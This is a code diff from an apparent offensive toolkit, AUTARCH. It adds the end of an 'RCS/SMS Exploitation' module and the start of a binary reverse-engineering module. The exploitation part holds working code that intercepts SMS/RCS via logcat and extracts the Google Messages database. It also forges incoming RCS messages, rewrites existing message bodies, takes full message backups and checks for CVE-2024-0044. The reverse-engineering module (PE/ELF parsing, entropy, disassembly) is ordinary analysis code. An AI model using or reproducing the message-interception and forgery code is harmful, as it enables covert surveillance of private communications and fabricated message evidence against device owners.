database snapshots.""" + extractions = [] + for d in sorted(self._extracted_dir.iterdir(), reverse=True): + if d.is_dir(): + files = [f.name for f in d.iterdir()] + total_size = sum(f.stat().st_size for f in d.iterdir() if f.is_file()) + extractions.append({ + 'name': d.name, + 'path': str(d), + 'files': files, + 'total_size': total_size, + }) + return {'ok': True, 'extractions': extractions, 'count': len(extractions)} + + # ══════════════════════════════════════════════════════════════════════ + # §11 SMS/RCS MONITOR + # ══════════════════════════════════════════════════════════════════════ + + def start_sms_monitor(self) -> Dict[str, Any]: + if self._monitor_running: + return {'ok': False, 'error': 'Monitor already running'} + self._monitor_running = True + self._monitor_thread = threading.Thread( + target=self._monitor_loop, daemon=True, name='rcs-monitor', + ) + self._monitor_thread.start() + return {'ok': True, 'message': 'SMS/RCS monitor started'} + + def stop_sms_monitor(self) -> Dict[str, Any]: + self._monitor_running = False + return {'ok': True, 'message': 'Monitor stopping', + 'intercepted': len(self._intercepted)} + + def get_intercepted_messages(self) -> Dict[str, Any]: + with self._intercepted_lock: + msgs = list(self._intercepted) + return {'ok': True, 'messages': msgs, 'count': len(msgs)} + + def clear_intercepted(self) -> Dict[str, Any]: + with self._intercepted_lock: + count = len(self._intercepted) + self._intercepted.clear() + return {'ok': True, 'cleared': count} + + def _monitor_loop(self): + """Background thread: watch logcat for incoming SMS/RCS.""" + adb = self._get_adb() + try: + proc = subprocess.Popen( + f'{adb} shell logcat -s Bugle:V SmsReceiverService:V ' + f'SmsMessage:V RilReceiver:V', + shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True, + ) + while self._monitor_running: + line = proc.stdout.readline() + if not line: + break + line = line.strip() + if not line: + continue + # Parse relevant log lines + entry = 
None + if 'SMS received' in line or 'received SMS' in line.lower(): + entry = {'type': 'sms_received', 'raw': line, 'time': datetime.now().isoformat()} + elif 'RCS' in line and ('received' in line.lower() or 'incoming' in line.lower()): + entry = {'type': 'rcs_received', 'raw': line, 'time': datetime.now().isoformat()} + elif 'SmsMessage' in line: + entry = {'type': 'sms_activity', 'raw': line, 'time': datetime.now().isoformat()} + if entry: + with self._intercepted_lock: + self._intercepted.append(entry) + if len(self._intercepted) > 1000: + self._intercepted = self._intercepted[-500:] + proc.terminate() + except Exception: + pass + finally: + self._monitor_running = False + + def get_forged_log(self) -> List[Dict[str, Any]]: + return list(self._forged_log) + + def clear_forged_log(self) -> Dict[str, Any]: + count = len(self._forged_log) + self._forged_log.clear() + return {'ok': True, 'cleared': count} + + # ══════════════════════════════════════════════════════════════════════ + # §12 ARCHON APP INTEGRATION + # ══════════════════════════════════════════════════════════════════════ + + def archon_query(self, action: str, extras: Optional[Dict[str, str]] = None) -> Dict[str, Any]: + """Send a command to Archon's MessagingModule via ADB broadcast.""" + cmd = f'shell am broadcast -a com.darkhal.archon.{action}' + if extras: + for key, val in extras.items(): + if isinstance(val, int): + cmd += f' --ei {key} {val}' + elif isinstance(val, bool): + cmd += f' --ez {key} {str(val).lower()}' + else: + safe = str(val).replace('"', '\\"') + cmd += f' --es {key} "{safe}"' + cmd += ' com.darkhal.archon' + result = self._run_adb(cmd) + return { + 'ok': 'Broadcast completed' in result, + 'result': result, + } + + def archon_extract_bugle(self) -> Dict[str, Any]: + """Ask Archon to extract bugle_db via Shizuku elevated access.""" + return self.archon_query('EXTRACT_DB', { + 'target_package': 'com.google.android.apps.messaging', + 'database': 'bugle_db', + 'output_dir': 
'/sdcard/Download/autarch_extract', + }) + + def archon_forge_rcs(self, address: str, body: str, direction: str = 'incoming') -> Dict[str, Any]: + """Ask Archon to insert RCS message directly into bugle_db.""" + return self.archon_query('FORGE_RCS', { + 'address': address, + 'body': body, + 'direction': direction, + 'timestamp': str(self._ts_ms()), + }) + + def archon_modify_rcs(self, msg_id: int, new_body: str) -> Dict[str, Any]: + """Ask Archon to modify an RCS message in bugle_db.""" + return self.archon_query('MODIFY_RCS', { + 'msg_id': msg_id, + 'new_body': new_body, + }) + + def archon_get_rcs_threads(self) -> Dict[str, Any]: + """Get RCS thread list via Archon relay.""" + return self.archon_query('GET_RCS_THREADS') + + def archon_backup_all(self) -> Dict[str, Any]: + """Full backup via Archon (SMS + MMS + RCS + attachments).""" + result = self.archon_query('FULL_BACKUP', { + 'output_dir': '/sdcard/Download/autarch_backup', + 'include_rcs': 'true', + 'include_attachments': 'true', + }) + if result.get('ok'): + # Pull the backup + time.sleep(5) + timestamp = datetime.now().strftime('%Y%m%d_%H%M%S') + local_dir = self._backups_dir / f'archon_backup_{timestamp}' + local_dir.mkdir(parents=True, exist_ok=True) + pull = self._run_adb(f'pull /sdcard/Download/autarch_backup/ {local_dir}/') + result['local_path'] = str(local_dir) + result['pull_result'] = pull + return result + + def archon_set_default_sms(self) -> Dict[str, Any]: + """Set Archon as the default SMS/RCS app (enables full message access).""" + return self.set_default_sms_app('com.darkhal.archon') + + # ══════════════════════════════════════════════════════════════════════ + # §13 PIXEL-SPECIFIC TOOLS + # ══════════════════════════════════════════════════════════════════════ + + def pixel_diagnostics(self) -> Dict[str, Any]: + """Run Pixel-specific RCS diagnostic commands.""" + results = {} + # IMS status + results['ims'] = self._shell('dumpsys telephony_ims')[:3000] + # Carrier config (extract 
RCS-relevant keys) + cc = self.get_carrier_config() + results['carrier_rcs_config'] = cc.get('rcs_config', {}) + # Phone info + results['phone'] = self._shell('dumpsys phone | head -50') + # Check if Pixel + brand = self._shell('getprop ro.product.brand').lower() + results['is_pixel'] = 'google' in brand + # RCS-specific settings + results['rcs_settings'] = {} + for key in ['rcs_autoconfiguration_enabled', 'rcs_e2ee_enabled', + 'chat_features_enabled']: + val = self._shell(f'settings get global {key}') + if not self._is_error(val): + results['rcs_settings'][key] = val + return {'ok': True, **results} + + def enable_debug_menu(self) -> Dict[str, Any]: + """Instructions and automation for enabling Google Messages debug menu.""" + return { + 'ok': True, + 'instructions': [ + '1. Open Google Messages on the device', + '2. Tap the search bar', + '3. Type: *xyzzy*', + '4. A debug menu will appear in Settings', + '5. Enables: RCS connection state, ACS URL, feature flags, verbose logging', + ], + 'automated_phenotype': 'Use enable_verbose_logging() to enable debug flags via Phenotype', + } + + # ══════════════════════════════════════════════════════════════════════ + # §14 CLI ENTRY POINT + # ══════════════════════════════════════════════════════════════════════ + + def run(self): + """CLI interactive mode.""" + print(f"\n RCS/SMS Exploitation v{VERSION}") + print(" " + "=" * 40) + status = self.get_status() + if status.get('connected'): + dev = status['device'] + print(f" Device: {dev.get('model', '?')} ({dev.get('serial', '?')})") + print(f" Android: {dev.get('android_version', '?')} (patch: {dev.get('security_patch', '?')})") + print(f" SMS App: {dev.get('default_sms_app', '?')}") + shizuku = status.get('shizuku', {}) + print(f" Shizuku: {'running' if shizuku.get('running') else 'not running'}") + archon = status.get('archon', {}) + print(f" Archon: {'installed' if archon.get('installed') else 'not installed'}") + cve = status.get('cve_2024_0044', {}) + if 
cve.get('vulnerable'): + print(f" CVE-2024-0044: VULNERABLE") + else: + print(" No device connected") + + +def run(): + get_rcs_tools().run() diff --git a/modules/reverse_eng.py b/modules/reverse_eng.py new file mode 100644 index 0000000..658e63b --- /dev/null +++ b/modules/reverse_eng.py @@ -0,0 +1,1979 @@ +"""AUTARCH Reverse Engineering Toolkit + +Binary analysis, PE/ELF parsing, disassembly, YARA scanning, +hex viewing, packer detection, and Ghidra headless integration. +""" + +DESCRIPTION = "Binary analysis, disassembly & reverse engineering" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "analyze" + +import os +import sys +import re +import math +import json +import struct +import hashlib +import subprocess +import tempfile +from pathlib import Path +from datetime import datetime +from typing import Dict, List, Optional, Any, Tuple + +sys.path.insert(0, str(Path(__file__).parent.parent)) + +try: + from core.paths import get_data_dir, find_tool +except ImportError: + def get_data_dir(): + return str(Path(__file__).parent.parent / 'data') + + def find_tool(name, extra_paths=None): + import shutil + return shutil.which(name) + +try: + from core.banner import Colors, clear_screen, display_banner +except ImportError: + class Colors: + CYAN = BOLD = GREEN = YELLOW = RED = WHITE = DIM = RESET = "" + def clear_screen(): pass + def display_banner(): pass + +# Optional: capstone disassembler +try: + import capstone + HAS_CAPSTONE = True +except ImportError: + HAS_CAPSTONE = False + +# Optional: yara-python +try: + import yara + HAS_YARA = True +except ImportError: + HAS_YARA = False + + +# ── Magic Bytes ────────────────────────────────────────────────────────────── + +MAGIC_BYTES = { + b'\x4d\x5a': 'PE', + b'\x7fELF': 'ELF', + b'\xfe\xed\xfa\xce': 'Mach-O (32-bit)', + b'\xfe\xed\xfa\xcf': 'Mach-O (64-bit)', + b'\xce\xfa\xed\xfe': 'Mach-O (32-bit, reversed)', + b'\xcf\xfa\xed\xfe': 'Mach-O (64-bit, reversed)', + b'\xca\xfe\xba\xbe': 'Mach-O (Universal)', + 
b'\x50\x4b\x03\x04': 'ZIP/JAR/APK/DOCX', + b'\x50\x4b\x05\x06': 'ZIP (empty)', + b'\x25\x50\x44\x46': 'PDF', + b'\xd0\xcf\x11\xe0': 'OLE2 (DOC/XLS/PPT)', + b'\x89\x50\x4e\x47': 'PNG', + b'\xff\xd8\xff': 'JPEG', + b'\x47\x49\x46\x38': 'GIF', + b'\x1f\x8b': 'GZIP', + b'\x42\x5a\x68': 'BZIP2', + b'\xfd\x37\x7a\x58': 'XZ', + b'\x37\x7a\xbc\xaf': '7-Zip', + b'\x52\x61\x72\x21': 'RAR', + b'\xca\xfe\xba\xbe': 'Java Class / Mach-O Universal', + b'\x7f\x45\x4c\x46': 'ELF', + b'\x23\x21': 'Script (shebang)', + b'\x00\x61\x73\x6d': 'WebAssembly', + b'\xed\xab\xee\xdb': 'RPM', + b'\x21\x3c\x61\x72': 'Debian/AR archive', +} + + +# ── Packer Signatures ─────────────────────────────────────────────────────── + +PACKER_SIGNATURES = { + 'UPX': { + 'section_names': [b'UPX0', b'UPX1', b'UPX2', b'UPX!'], + 'magic': [b'UPX!', b'UPX0', b'\x55\x50\x58'], + 'description': 'Ultimate Packer for Executables', + }, + 'Themida': { + 'section_names': [b'.themida', b'.winlice'], + 'magic': [], + 'description': 'Themida / WinLicense protector', + }, + 'ASPack': { + 'section_names': [b'.aspack', b'.adata'], + 'magic': [b'\x60\xe8\x00\x00\x00\x00\x5d\x81\xed'], + 'description': 'ASPack packer', + }, + 'MPRESS': { + 'section_names': [b'.MPRESS1', b'.MPRESS2'], + 'magic': [], + 'description': 'MPRESS packer', + }, + 'VMProtect': { + 'section_names': [b'.vmp0', b'.vmp1', b'.vmp2'], + 'magic': [], + 'description': 'VMProtect software protection', + }, + 'PECompact': { + 'section_names': [b'PEC2', b'pec1', b'pec2', b'PEC2TO'], + 'magic': [], + 'description': 'PECompact packer', + }, + 'Petite': { + 'section_names': [b'.petite'], + 'magic': [b'\xb8\x00\x00\x00\x00\x66\x9c\x60\x50'], + 'description': 'Petite packer', + }, + 'NSPack': { + 'section_names': [b'.nsp0', b'.nsp1', b'.nsp2', b'nsp0', b'nsp1'], + 'magic': [], + 'description': 'NSPack (North Star) packer', + }, + 'Enigma': { + 'section_names': [b'.enigma1', b'.enigma2'], + 'magic': [], + 'description': 'Enigma Protector', + }, + 'MEW': { + 
'section_names': [b'MEW'], + 'magic': [], + 'description': 'MEW packer', + }, +} + + +# ── PE Constants ───────────────────────────────────────────────────────────── + +PE_MACHINE_TYPES = { + 0x0: 'Unknown', + 0x14c: 'x86 (i386)', + 0x166: 'MIPS R4000', + 0x1a2: 'Hitachi SH3', + 0x1a6: 'Hitachi SH4', + 0x1c0: 'ARM', + 0x1c4: 'ARM Thumb-2', + 0x200: 'Intel IA-64', + 0x8664: 'x86-64 (AMD64)', + 0xaa64: 'ARM64 (AArch64)', + 0x5032: 'RISC-V 32-bit', + 0x5064: 'RISC-V 64-bit', +} + +PE_SECTION_FLAGS = { + 0x00000020: 'CODE', + 0x00000040: 'INITIALIZED_DATA', + 0x00000080: 'UNINITIALIZED_DATA', + 0x02000000: 'DISCARDABLE', + 0x04000000: 'NOT_CACHED', + 0x08000000: 'NOT_PAGED', + 0x10000000: 'SHARED', + 0x20000000: 'EXECUTE', + 0x40000000: 'READ', + 0x80000000: 'WRITE', +} + + +# ── ELF Constants ──────────────────────────────────────────────────────────── + +ELF_MACHINE_TYPES = { + 0: 'None', + 2: 'SPARC', + 3: 'x86', + 8: 'MIPS', + 20: 'PowerPC', + 21: 'PowerPC64', + 40: 'ARM', + 43: 'SPARC V9', + 50: 'IA-64', + 62: 'x86-64', + 183: 'AArch64 (ARM64)', + 243: 'RISC-V', + 247: 'eBPF', +} + +ELF_TYPES = {0: 'NONE', 1: 'REL', 2: 'EXEC', 3: 'DYN', 4: 'CORE'} + +ELF_OSABI = { + 0: 'UNIX System V', 1: 'HP-UX', 2: 'NetBSD', 3: 'Linux', + 6: 'Solaris', 7: 'AIX', 8: 'IRIX', 9: 'FreeBSD', 12: 'OpenBSD', +} + +ELF_SH_TYPES = { + 0: 'NULL', 1: 'PROGBITS', 2: 'SYMTAB', 3: 'STRTAB', 4: 'RELA', + 5: 'HASH', 6: 'DYNAMIC', 7: 'NOTE', 8: 'NOBITS', 9: 'REL', + 11: 'DYNSYM', +} + +ELF_PT_TYPES = { + 0: 'NULL', 1: 'LOAD', 2: 'DYNAMIC', 3: 'INTERP', 4: 'NOTE', + 5: 'SHLIB', 6: 'PHDR', 7: 'TLS', + 0x6474e550: 'GNU_EH_FRAME', 0x6474e551: 'GNU_STACK', + 0x6474e552: 'GNU_RELRO', 0x6474e553: 'GNU_PROPERTY', +} + + +# ── ReverseEngineer Class ──────────────────────────────────────────────────── + +class ReverseEngineer: + """Comprehensive binary analysis and reverse engineering toolkit.""" + + _instance = None + + def __init__(self): + data_dir = get_data_dir() if callable(get_data_dir) else 
get_data_dir + self.storage_dir = Path(str(data_dir)) / 'reverse_eng' + self.yara_rules_dir = self.storage_dir / 'yara_rules' + self.cache_dir = self.storage_dir / 'cache' + self.storage_dir.mkdir(parents=True, exist_ok=True) + self.yara_rules_dir.mkdir(parents=True, exist_ok=True) + self.cache_dir.mkdir(parents=True, exist_ok=True) + self._analysis_cache: Dict[str, Any] = {} + + # ── File Type Detection ────────────────────────────────────────────── + + def get_file_type(self, file_path: str) -> Dict[str, str]: + """Identify file type from magic bytes.""" + p = Path(file_path) + if not p.exists() or not p.is_file(): + return {'type': 'unknown', 'error': 'File not found'} + + try: + with open(p, 'rb') as f: + header = f.read(16) + except Exception as e: + return {'type': 'unknown', 'error': str(e)} + + if len(header) < 2: + return {'type': 'empty', 'description': 'File too small'} + + # Check magic bytes, longest match first + for magic, file_type in sorted(MAGIC_BYTES.items(), key=lambda x: -len(x[0])): + if header[:len(magic)] == magic: + return {'type': file_type, 'magic_hex': magic.hex()} + + # Heuristic: check if text file + try: + with open(p, 'rb') as f: + sample = f.read(8192) + text_chars = set(range(7, 14)) | set(range(32, 127)) | {0} + non_text = sum(1 for b in sample if b not in text_chars) + if non_text / max(len(sample), 1) < 0.05: + return {'type': 'Text', 'description': 'ASCII/UTF-8 text file'} + except Exception: + pass + + return {'type': 'unknown', 'magic_hex': header[:8].hex()} + + # ── Entropy Calculation ────────────────────────────────────────────── + + def calculate_entropy(self, data: bytes) -> float: + """Calculate Shannon entropy of byte data. 
Returns 0.0 to 8.0.""" + if not data: + return 0.0 + freq = [0] * 256 + for b in data: + freq[b] += 1 + length = len(data) + entropy = 0.0 + for count in freq: + if count > 0: + p = count / length + entropy -= p * math.log2(p) + return round(entropy, 4) + + def section_entropy(self, file_path: str) -> List[Dict[str, Any]]: + """Calculate entropy per section for PE/ELF binaries.""" + ft = self.get_file_type(file_path) + file_type = ft.get('type', '') + + results = [] + if file_type == 'PE': + pe_info = self.parse_pe(file_path) + if 'error' not in pe_info: + with open(file_path, 'rb') as f: + for sec in pe_info.get('sections', []): + offset = sec.get('raw_offset', 0) + size = sec.get('raw_size', 0) + if size > 0 and offset > 0: + f.seek(offset) + data = f.read(size) + ent = self.calculate_entropy(data) + results.append({ + 'name': sec.get('name', ''), + 'offset': offset, + 'size': size, + 'entropy': ent, + 'packed': ent > 7.0, + }) + elif file_type == 'ELF': + elf_info = self.parse_elf(file_path) + if 'error' not in elf_info: + with open(file_path, 'rb') as f: + for sec in elf_info.get('sections', []): + offset = sec.get('offset', 0) + size = sec.get('size', 0) + if size > 0 and offset > 0: + f.seek(offset) + data = f.read(size) + ent = self.calculate_entropy(data) + results.append({ + 'name': sec.get('name', ''), + 'offset': offset, + 'size': size, + 'entropy': ent, + 'packed': ent > 7.0, + }) + return results + + # ── Comprehensive Binary Analysis ──────────────────────────────────── + + def analyze_binary(self, file_path: str) -> Dict[str, Any]: + """Comprehensive binary analysis: type, hashes, entropy, strings, architecture.""" + p = Path(file_path) + if not p.exists() or not p.is_file(): + return {'error': f'File not found: {file_path}'} + + stat = p.stat() + + # Read file data + try: + with open(p, 'rb') as f: + data = f.read() + except Exception as e: + return {'error': f'Cannot read file: {e}'} + + # File type + file_type = self.get_file_type(file_path) + + # 
Hashes + hashes = { + 'md5': hashlib.md5(data).hexdigest(), + 'sha1': hashlib.sha1(data).hexdigest(), + 'sha256': hashlib.sha256(data).hexdigest(), + } + + # Overall entropy + overall_entropy = self.calculate_entropy(data) + + # Section entropy + sec_entropy = self.section_entropy(file_path) + + # Architecture detection + arch = 'unknown' + ftype = file_type.get('type', '') + if ftype == 'PE': + pe = self.parse_pe(file_path) + arch = pe.get('machine_str', 'unknown') + elif ftype == 'ELF': + elf = self.parse_elf(file_path) + arch = elf.get('machine_str', 'unknown') + + # Extract strings (limited to first 1MB for speed) + sample = data[:1024 * 1024] + strings = self._extract_strings_from_data(sample, min_length=4) + + # Packer detection + packer = self.detect_packer(file_path) + + result = { + 'file': str(p.absolute()), + 'name': p.name, + 'size': stat.st_size, + 'size_human': self._human_size(stat.st_size), + 'modified': datetime.fromtimestamp(stat.st_mtime).isoformat(), + 'created': datetime.fromtimestamp(stat.st_ctime).isoformat(), + 'file_type': file_type, + 'architecture': arch, + 'hashes': hashes, + 'entropy': overall_entropy, + 'entropy_level': 'high' if overall_entropy > 7.0 else ('medium' if overall_entropy > 6.0 else 'low'), + 'section_entropy': sec_entropy, + 'strings_count': len(strings), + 'strings_preview': strings[:100], + 'packer': packer, + } + + # Add imports/exports if applicable + if ftype == 'PE': + result['imports'] = self.get_imports(file_path) + result['exports'] = self.get_exports(file_path) + elif ftype == 'ELF': + result['imports'] = self.get_imports(file_path) + result['exports'] = self.get_exports(file_path) + + # Cache result + self._analysis_cache[file_path] = result + return result + + # ── PE Parsing ─────────────────────────────────────────────────────── + + def parse_pe(self, file_path: str) -> Dict[str, Any]: + """Parse PE (Portable Executable) headers using struct.unpack.""" + p = Path(file_path) + if not p.exists(): + return 
{'error': 'File not found'} + + try: + with open(p, 'rb') as f: + data = f.read() + except Exception as e: + return {'error': str(e)} + + if len(data) < 64 or data[:2] != b'\x4d\x5a': + return {'error': 'Not a valid PE file (missing MZ header)'} + + # DOS Header + e_lfanew = struct.unpack_from(' len(data): + return {'error': 'Invalid PE offset'} + + # PE Signature + pe_sig = data[e_lfanew:e_lfanew + 4] + if pe_sig != b'PE\x00\x00': + return {'error': 'Invalid PE signature'} + + # COFF Header (20 bytes after PE signature) + coff_offset = e_lfanew + 4 + if coff_offset + 20 > len(data): + return {'error': 'Truncated COFF header'} + + machine, num_sections, time_stamp, sym_table_ptr, num_symbols, \ + opt_header_size, characteristics = struct.unpack_from( + ' len(data): + return {'error': 'Truncated optional header'} + + opt_magic = struct.unpack_from(' len(data): + break + name_raw = data[off:off + 8] + name = name_raw.rstrip(b'\x00').decode('ascii', errors='replace') + vsize, vaddr, raw_size, raw_offset, reloc_ptr, linenum_ptr, \ + num_relocs, num_linenums, chars = struct.unpack_from( + ' Dict[str, Any]: + """Parse ELF (Executable and Linkable Format) headers using struct.unpack.""" + p = Path(file_path) + if not p.exists(): + return {'error': 'File not found'} + + try: + with open(p, 'rb') as f: + data = f.read() + except Exception as e: + return {'error': str(e)} + + if len(data) < 16 or data[:4] != b'\x7fELF': + return {'error': 'Not a valid ELF file'} + + # ELF Identification + ei_class = data[4] # 1=32-bit, 2=64-bit + ei_data = data[5] # 1=little-endian, 2=big-endian + ei_version = data[6] + ei_osabi = data[7] + + is_64 = (ei_class == 2) + endian = '<' if ei_data == 1 else '>' + bits_str = '64-bit' if is_64 else '32-bit' + endian_str = 'Little Endian' if ei_data == 1 else 'Big Endian' + + # ELF Header + if is_64: + if len(data) < 64: + return {'error': 'Truncated ELF64 header'} + e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, \ + e_flags, e_ehsize, 
e_phentsize, e_phnum, e_shentsize, \ + e_shnum, e_shstrndx = struct.unpack_from( + f'{endian}HHIQQQIHHHHHH', data, 16) + else: + if len(data) < 52: + return {'error': 'Truncated ELF32 header'} + e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, \ + e_flags, e_ehsize, e_phentsize, e_phnum, e_shentsize, \ + e_shnum, e_shstrndx = struct.unpack_from( + f'{endian}HHIIIIIHHHHHH', data, 16) + + machine_str = ELF_MACHINE_TYPES.get(e_machine, f'Unknown ({e_machine})') + type_str = ELF_TYPES.get(e_type, f'Unknown ({e_type})') + osabi_str = ELF_OSABI.get(ei_osabi, f'Unknown ({ei_osabi})') + + # Section Headers + sections = [] + shstrtab_data = b'' + if e_shstrndx < e_shnum and e_shoff > 0: + strtab_off = e_shoff + e_shstrndx * e_shentsize + if is_64 and strtab_off + 64 <= len(data): + sh_offset = struct.unpack_from(f'{endian}Q', data, strtab_off + 24)[0] + sh_size = struct.unpack_from(f'{endian}Q', data, strtab_off + 32)[0] + elif not is_64 and strtab_off + 40 <= len(data): + sh_offset = struct.unpack_from(f'{endian}I', data, strtab_off + 16)[0] + sh_size = struct.unpack_from(f'{endian}I', data, strtab_off + 20)[0] + else: + sh_offset = 0 + sh_size = 0 + if sh_offset + sh_size <= len(data): + shstrtab_data = data[sh_offset:sh_offset + sh_size] + + for i in range(e_shnum): + off = e_shoff + i * e_shentsize + if is_64: + if off + 64 > len(data): + break + sh_name, sh_type, sh_flags, sh_addr, sh_offset, sh_size, \ + sh_link, sh_info, sh_addralign, sh_entsize = struct.unpack_from( + f'{endian}IIQQQQIIQQ', data, off) + else: + if off + 40 > len(data): + break + sh_name, sh_type, sh_flags, sh_addr, sh_offset, sh_size, \ + sh_link, sh_info, sh_addralign, sh_entsize = struct.unpack_from( + f'{endian}IIIIIIIIII', data, off) + + # Resolve section name from string table + name = '' + if sh_name < len(shstrtab_data): + end = shstrtab_data.index(b'\x00', sh_name) if b'\x00' in shstrtab_data[sh_name:] else len(shstrtab_data) + name = shstrtab_data[sh_name:end].decode('ascii', 
errors='replace') + + type_name = ELF_SH_TYPES.get(sh_type, f'0x{sh_type:x}') + + sections.append({ + 'name': name, + 'type': type_name, + 'type_raw': sh_type, + 'flags': f'0x{sh_flags:x}', + 'address': f'0x{sh_addr:x}', + 'offset': sh_offset, + 'size': sh_size, + 'link': sh_link, + 'info': sh_info, + 'alignment': sh_addralign, + 'entry_size': sh_entsize, + }) + + # Program Headers + program_headers = [] + for i in range(e_phnum): + off = e_phoff + i * e_phentsize + if is_64: + if off + 56 > len(data): + break + p_type, p_flags, p_offset, p_vaddr, p_paddr, p_filesz, \ + p_memsz, p_align = struct.unpack_from( + f'{endian}IIQQQQQQ', data, off) + else: + if off + 32 > len(data): + break + p_type, p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, \ + p_flags, p_align = struct.unpack_from( + f'{endian}IIIIIIII', data, off) + + pt_name = ELF_PT_TYPES.get(p_type, f'0x{p_type:x}') + perm_str = '' + perm_str += 'R' if p_flags & 4 else '-' + perm_str += 'W' if p_flags & 2 else '-' + perm_str += 'X' if p_flags & 1 else '-' + + program_headers.append({ + 'type': pt_name, + 'type_raw': p_type, + 'flags': perm_str, + 'offset': f'0x{p_offset:x}', + 'vaddr': f'0x{p_vaddr:x}', + 'paddr': f'0x{p_paddr:x}', + 'file_size': p_filesz, + 'mem_size': p_memsz, + 'alignment': p_align, + }) + + # Dynamic section symbols + dynamic = [] + for sec in sections: + if sec['type'] == 'DYNAMIC' and sec['size'] > 0: + dyn_off = sec['offset'] + dyn_size = sec['size'] + entry_sz = 16 if is_64 else 8 + for j in range(0, dyn_size, entry_sz): + off = dyn_off + j + if is_64 and off + 16 <= len(data): + d_tag, d_val = struct.unpack_from(f'{endian}qQ', data, off) + elif not is_64 and off + 8 <= len(data): + d_tag, d_val = struct.unpack_from(f'{endian}iI', data, off) + else: + break + if d_tag == 0: + break + dynamic.append({'tag': d_tag, 'value': f'0x{d_val:x}'}) + + result = { + 'format': 'ELF', + 'class': bits_str, + 'endianness': endian_str, + 'osabi': osabi_str, + 'type': type_str, + 'type_raw': e_type, + 
'machine': f'0x{e_machine:x}', + 'machine_str': machine_str, + 'entry_point': f'0x{e_entry:x}', + 'flags': f'0x{e_flags:x}', + 'num_sections': e_shnum, + 'num_program_headers': e_phnum, + 'sections': sections, + 'program_headers': program_headers, + 'dynamic': dynamic[:50], + } + + return result + + # ── String Extraction ──────────────────────────────────────────────── + + def _extract_strings_from_data(self, data: bytes, min_length: int = 4) -> List[Dict[str, Any]]: + """Extract ASCII and Unicode strings from raw byte data.""" + results = [] + + # ASCII strings + ascii_pattern = re.compile(rb'[\x20-\x7e]{' + str(min_length).encode() + rb',}') + for match in ascii_pattern.finditer(data): + results.append({ + 'offset': match.start(), + 'string': match.group().decode('ascii', errors='replace'), + 'encoding': 'ascii', + }) + + # UTF-16LE strings (common in PE binaries) + i = 0 + while i < len(data) - 1: + # Look for sequences of printable chars with null bytes interleaved + chars = [] + start = i + while i < len(data) - 1: + lo, hi = data[i], data[i + 1] + if hi == 0 and 0x20 <= lo <= 0x7e: + chars.append(chr(lo)) + i += 2 + else: + break + if len(chars) >= min_length: + results.append({ + 'offset': start, + 'string': ''.join(chars), + 'encoding': 'unicode', + }) + else: + i += 1 + + # Sort by offset and deduplicate + results.sort(key=lambda x: x['offset']) + return results + + def extract_strings(self, file_path: str, min_length: int = 4, + encoding: str = 'both') -> List[Dict[str, Any]]: + """Extract printable strings from a binary file.""" + p = Path(file_path) + if not p.exists(): + return [] + + try: + with open(p, 'rb') as f: + data = f.read() + except Exception: + return [] + + results = self._extract_strings_from_data(data, min_length) + + if encoding == 'ascii': + results = [s for s in results if s['encoding'] == 'ascii'] + elif encoding == 'unicode': + results = [s for s in results if s['encoding'] == 'unicode'] + + return results + + # ── Disassembly 
# ── Disassembly ──────────────────────────────────────────────────────

def disassemble(self, data: bytes, arch: str = 'x64', mode: str = '64',
                offset: int = 0, count: int = 0) -> List[Dict[str, Any]]:
    """Disassemble raw bytes. Uses capstone if available, otherwise objdump."""
    if HAS_CAPSTONE:
        return self._disassemble_capstone(data, arch, mode, offset, count)
    return self._disassemble_objdump(data, arch, offset, count)

def _disassemble_capstone(self, data: bytes, arch: str, mode: str,
                          offset: int, count: int) -> List[Dict[str, Any]]:
    """Disassemble using the capstone engine.

    arch: one of x86/x64/arm/arm64/mips; unknown values fall back to x64.
    count: maximum number of instructions to return (0 = unlimited).
    """
    arch_map = {
        'x86': (capstone.CS_ARCH_X86, capstone.CS_MODE_32),
        'x64': (capstone.CS_ARCH_X86, capstone.CS_MODE_64),
        'arm': (capstone.CS_ARCH_ARM, capstone.CS_MODE_ARM),
        'arm64': (capstone.CS_ARCH_ARM64, capstone.CS_MODE_ARM),
        'mips': (capstone.CS_ARCH_MIPS, capstone.CS_MODE_MIPS32),
    }
    cs_arch, cs_mode = arch_map.get(arch.lower(), (capstone.CS_ARCH_X86, capstone.CS_MODE_64))
    md = capstone.Cs(cs_arch, cs_mode)

    instructions: List[Dict[str, Any]] = []
    for i, (address, size, mnemonic, op_str) in enumerate(md.disasm_lite(data, offset)):
        if count > 0 and i >= count:
            break
        # disasm_lite addresses start at `offset`; map back into `data`.
        inst_bytes = data[address - offset:address - offset + size]
        instructions.append({
            'address': f'0x{address:08x}',
            'mnemonic': mnemonic,
            'op_str': op_str,
            'bytes_hex': inst_bytes.hex(),
            'size': size,
        })
    return instructions

def _disassemble_objdump(self, data: bytes, arch: str,
                         offset: int, count: int) -> List[Dict[str, Any]]:
    """Disassemble using objdump as a fallback when capstone is absent."""
    objdump = find_tool('objdump')
    if not objdump:
        return [{'error': 'No disassembler available. Install capstone (pip install capstone) or objdump.'}]

    # objdump only reads files, so spill the bytes to a temp file.
    with tempfile.NamedTemporaryFile(suffix='.bin', delete=False) as tmp:
        tmp.write(data)
        tmp_path = tmp.name

    try:
        arch_flag = {
            'x86': 'i386', 'x64': 'i386:x86-64',
            'arm': 'arm', 'arm64': 'aarch64',
        }.get(arch.lower(), 'i386:x86-64')

        cmd = [objdump, '-D', '-b', 'binary', '-m', arch_flag, tmp_path]
        result = subprocess.run(cmd, capture_output=True, text=True, timeout=30)

        instructions: List[Dict[str, Any]] = []
        for line in result.stdout.splitlines():
            match = re.match(r'\s*([0-9a-f]+):\s+([0-9a-f ]+?)\s+(\w+)\s*(.*)', line)
            if match:
                addr_str, bytes_hex, mnemonic, op_str = match.groups()
                instructions.append({
                    'address': f'0x{int(addr_str, 16) + offset:08x}',
                    'mnemonic': mnemonic.strip(),
                    'op_str': op_str.strip(),
                    'bytes_hex': bytes_hex.replace(' ', ''),
                })
                if count > 0 and len(instructions) >= count:
                    break
        return instructions
    except Exception as e:
        return [{'error': f'objdump failed: {e}'}]
    finally:
        try:
            os.unlink(tmp_path)
        except Exception:
            pass

def disassemble_file(self, file_path: str, section: str = '.text',
                     offset: int = 0, count: int = 100) -> List[Dict[str, Any]]:
    """Disassemble a named section of a PE or ELF binary.

    The architecture is inferred from the file headers; at most 64 KiB of
